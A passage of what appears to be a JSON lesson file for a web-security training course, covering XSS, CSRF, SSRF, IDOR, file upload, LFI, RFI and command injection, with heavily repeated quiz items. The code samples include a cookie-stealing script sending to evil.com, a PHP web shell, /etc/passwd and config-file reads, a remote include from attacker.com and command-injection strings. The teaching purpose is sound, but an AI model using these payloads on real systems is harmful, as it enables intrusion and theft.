restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"xss-stored","cat":"Web Application","title":"XSS \u2014 Stored","diff":2,"xp":150,"intro":"Persistent script in DB.","sections":[{"type":"text","content":"Persistent script in DB."},{"type":"code","lang":"js","content":"<script>fetch('https://evil.com/steal?c='+document.cookie)</script>"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Why more dangerous?","opts":["Harder","Affects every user viewing the page","HTTPS bypass","Root"],"ans":1},{"type":"quiz","q":"Which encoding prevents XSS in HTML output?","opts":["Base64","URL encoding","HTML entity encoding","Hex encoding"],"ans":2},{"type":"quiz","q":"Which HTTP method is used to submit form data?","opts":["GET","POST","PUT","TRACE"],"ans":1},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"xss-dom","cat":"Web Application","title":"XSS \u2014 DOM-based","diff":2,"xp":150,"intro":"Client-side JS vulnerability.","sections":[{"type":"text","content":"Client-side JS vulnerability."},{"type":"code","lang":"js","content":"// document.getElementById('out').innerHTML = location.hash.slice(1)\n#<img src=x onerror=alert(1)>"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"DOM XSS location?","opts":["Server","Client-side JavaScript","Database","Network"],"ans":1},{"type":"quiz","q":"What header prevents clickjacking?","opts":["X-XSS-Protection","Content-Type","X-Frame-Options","Cache-Control"],"ans":2},{"type":"quiz","q":"Input validation should happen on...","opts":["Client side only","Server side only","Both client and server side","Neither"],"ans":2},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"csrf-atk","cat":"Web Application","title":"CSRF Attacks","diff":1,"xp":100,"intro":"Force authenticated actions.","sections":[{"type":"text","content":"Force authenticated actions."},{"type":"code","lang":"html","content":"<form action='https://target/transfer' method='POST'>\n<input name='to' value='attacker'></form>\n<script>document.forms[0].submit()</script>"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"CSRF enabled by?","opts":["JS","Automatic cookie inclusion","HTML","CSS"],"ans":1},{"type":"quiz","q":"A 403 response means...","opts":["Not found","Forbidden","Server error","Redirect"],"ans":1},{"type":"quiz","q":"Which encoding prevents XSS in HTML output?","opts":["Base64","URL encoding","HTML entity encoding","Hex encoding"],"ans":2},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"ssrf-atk","cat":"Web Application","title":"SSRF Attacks","diff":2,"xp":150,"intro":"Server fetches internal resources.","sections":[{"type":"text","content":"Server fetches internal resources."},{"type":"code","lang":"bash","content":"curl 'https://target/fetch?url=http://169.254.169.254/latest/meta-data/'"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Cloud SSRF target?","opts":["10.0.0.1","169.254.169.254","192.168.1.1","127.0.0.1"],"ans":1},{"type":"quiz","q":"Which HTTP method is used to submit form data?","opts":["GET","POST","PUT","TRACE"],"ans":1},{"type":"quiz","q":"What header prevents clickjacking?","opts":["X-XSS-Protection","Content-Type","X-Frame-Options","Cache-Control"],"ans":2},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"idor-atk","cat":"Web Application","title":"IDOR Vulnerabilities","diff":1,"xp":75,"intro":"Change IDs to access others' data.","sections":[{"type":"text","content":"Change IDs to access others' data."},{"type":"code","lang":"http","content":"GET /api/users/1/profile -- admin's profile\nGET /api/users/1337/profile -- your profile"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Missing check?","opts":["Input validation","Authorization","Authentication","Rate limiting"],"ans":1},{"type":"quiz","q":"Input validation should happen on...","opts":["Client side only","Server side only","Both client and server side","Neither"],"ans":2},{"type":"quiz","q":"A 403 response means...","opts":["Not found","Forbidden","Server error","Redirect"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"file-upload","cat":"Web Application","title":"File Upload Vulns","diff":2,"xp":150,"intro":"Upload web shells.","sections":[{"type":"text","content":"Upload web shells."},{"type":"code","lang":"bash","content":"<?php system($_GET['cmd']); ?>\n# Bypass: shell.php.jpg, shell.pHp"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Worst outcome?","opts":["Data theft","RCE via web shell","XSS","CSRF"],"ans":1},{"type":"quiz","q":"Which encoding prevents XSS in HTML output?","opts":["Base64","URL encoding","HTML entity encoding","Hex encoding"],"ans":2},{"type":"quiz","q":"Which HTTP method is used to submit form data?","opts":["GET","POST","PUT","TRACE"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"lfi-atk","cat":"Web Application","title":"LFI \u2014 Local File Inclusion","diff":2,"xp":150,"intro":"Read arbitrary server files.","sections":[{"type":"text","content":"Read arbitrary server files."},{"type":"code","lang":"bash","content":"?file=../../../../etc/passwd\n?file=php://filter/convert.base64-encode/resource=config.php"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"PHP source read wrapper?","opts":["php://input","php://filter","php://output","php://memory"],"ans":1},{"type":"quiz","q":"What header prevents clickjacking?","opts":["X-XSS-Protection","Content-Type","X-Frame-Options","Cache-Control"],"ans":2},{"type":"quiz","q":"Input validation should happen on...","opts":["Client side only","Server side only","Both client and server side","Neither"],"ans":2},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"rfi-atk","cat":"Web Application","title":"RFI \u2014 Remote File Inclusion","diff":2,"xp":150,"intro":"Include remote files.","sections":[{"type":"text","content":"Include remote files."},{"type":"code","lang":"bash","content":"?file=http://attacker.com/shell.php"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Required PHP setting?","opts":["display_errors","allow_url_include","register_globals","safe_mode"],"ans":1},{"type":"quiz","q":"A 403 response means...","opts":["Not found","Forbidden","Server error","Redirect"],"ans":1},{"type":"quiz","q":"Which encoding prevents XSS in HTML output?","opts":["Base64","URL encoding","HTML entity encoding","Hex encoding"],"ans":2},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"cmd-inj","cat":"Web Application","title":"Command Injection","diff":1,"xp":100,"intro":"Execute OS commands.","sections":[{"type":"text","content":"Execute OS commands."},{"type":"code","lang":"bash","content":"127.0.0.1; id\n127.0.0.1 | whoami\n$(cat /etc/passwd)"},{"type":"text","content":"Web vulnerabilities exist because developers 